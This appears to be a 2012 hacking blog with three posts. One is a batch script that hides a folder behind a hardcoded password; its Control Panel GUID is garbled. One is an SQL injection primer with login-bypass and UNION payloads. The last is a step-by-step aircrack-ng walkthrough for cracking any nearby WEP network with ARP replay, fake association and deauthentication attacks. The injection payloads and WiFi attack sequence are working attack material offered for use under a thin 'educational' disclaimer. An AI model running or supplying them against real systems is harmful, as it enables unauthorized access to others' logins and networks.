Search This Blog

Saturday 14 July 2012

LOCK A FOLDER WITHOUT ANY SOFTWARE

LOCK A FOLDER WITHOUT ANY SOFTWARE:
STEPS:

1. Open notepad and paste the following code in it.
2. Change the password in place of (qwerty)
3. Save the notepad as: Locker.bat
4. At first time start it will create folder with Locker automatically for u.
5. After creation of Locker folder again click on the Locker.bat
6. It will ask.press Y then Locker folder will be disappeared.
7. Again to get it click on locker.bat. and give ur password u will get the folder again.

note: current password is qwerty

CODE:

cls
@color A
@echo off
if EXIST "Control Panel.{21EC2020- 3AEA-1069- A2DD-08002B30309 D}" goto

unlock
if NOT EXIST locker goto mdfolder

:confirm
echo Are you sure want to lock the locker(Y/N)
set/p "ch="
if %ch%==y goto lock
if %ch%==Y goto lock
if %ch%==n goto end
if %ch%==N goto end
echo invalid choice
goto confirm

:lock
ren locker "Control Panel.{21EC2020- 3AEA-1069- A2DD-08002B30309 D}"
attrib +s +h "Control Panel.{21EC2020- 3AEA-1069- A2DD-08002B30309 D}"
echo lock successfully
goto end

:unlock
echo Enter password for unlock
set/p "pass="
if NOT %pass%==qwerty goto fail
attrib -s -h "Control Panel.{21EC2020- 3AEA-1069- A2DD-08002B30309 D}"
ren "Control Panel.{21EC2020- 3AEA-1069- A2DD-08002B30309 D}" locker
echo Unlock successfully
goto end

:fail
echo Invalid Password
goto end

:mdfolder
md locker
echo Locker created successfully
goto end

:end
echo Locker generated by xtreme hackers
echo www.xtremehackers.blogspot.com
pause:

.....................................................................................................

Friday 13 July 2012

SQL INJECTION

SQL injection is a code injection technique that exploits a security vulnerability occurring in the database
layer of an application. The vulnerability is present when user input is either incorrectly filtered for
string literal escape characters embedded in SQL statements or user input is not strongly typed and thereby
unexpectedly executed. It is in fact an instance of a more general class of vulnerabilities that can occur
whenever one programming or scripting language is embedded inside another.

SELECT * FROM users WHERE name = ‘a’ OR ‘t’='t’;

x’;UPDATE members SET email = ‘steve@unixwiz.net’ WHERE email = ‘bob@example.com

Bypassing Login Screens (SMO+)
SQL Injection 101, Login tricks

* admin’ –
* admin’ #
* admin’/*
* ‘ or 1=1–
* ‘ or 1=1#
* ‘ or 1=1/*
* ‘) or ’1′=’1–
* ‘) or (’1′=’1–
* ….

* Login as different user (SM*)
‘ UNION SELECT 1, ‘anotheruser’, ‘doesnt matter’, 1–

*Old versions of MySQL doesn’t support union queries

............................................................................................................

CRACK WIFI

Here is the detailed method for hacking a Wi-fi network......

Run the commands enlisted below in console mode of Linux Backtrack 4. (search in Google.. and u'll get the live CD for Backtrack 4 )

I tried to be as clear as possible.. at every command.. I tried to give brief explanation of the command itself.

You can try these steps to crack any Wireless network. It's strictly for Educational purpose.

------------------------------?-----------------------------
Finding the list of available Interfaces:
Iwconfig
------------------------------?----------------------------
Bring the card in monitor mode:
iwconfig mode monitor "Enable Monitor Mode"
OR
Bring the card in monitor mode using:
airmon-ng start
------------------------------?----------------------------
Scan for Access points and associated clients:
airodump-ng "GET BSSID, Channel, Station ID" first session
------------------------------?----------------------------
Capture packets to file:
airodump-ng --write --channel -b
------------------------------?----------------------------
Injection test:- check whether the card support injection or not:
aireplay-ng -9
------------------------------?----------------------------
Arp replay Attack:
aireplay-ng -3 -x 512 -b -h "ARP Attack"
------------------------------?----------------------------
Fake Association attack:
aireplay-ng -1 16 -a -c
------------------------------?----------------------------
Deauthentication Attack :
aireplay-ng -0 4 -a -h "Deauth Attack"
------------------------------?----------------------------
Crack WEP Key:
aircrack-ng -a 1 -b *.cap
------------------------------?--------------------------

You would require two essentials for cracking the wireless network:
1. Backtrack 4 Live CD
2. Wireless Network card

PLz dont try to hack any network with ur Laptop Wi-fi.. coz it sends huge number of packets to the network.. approx 35,000 packets ( to the network which we suppose to hack ). But if you wish to never use ur Laptop Wi-fi.. then it may actually a good solution for you.

....................................................................................................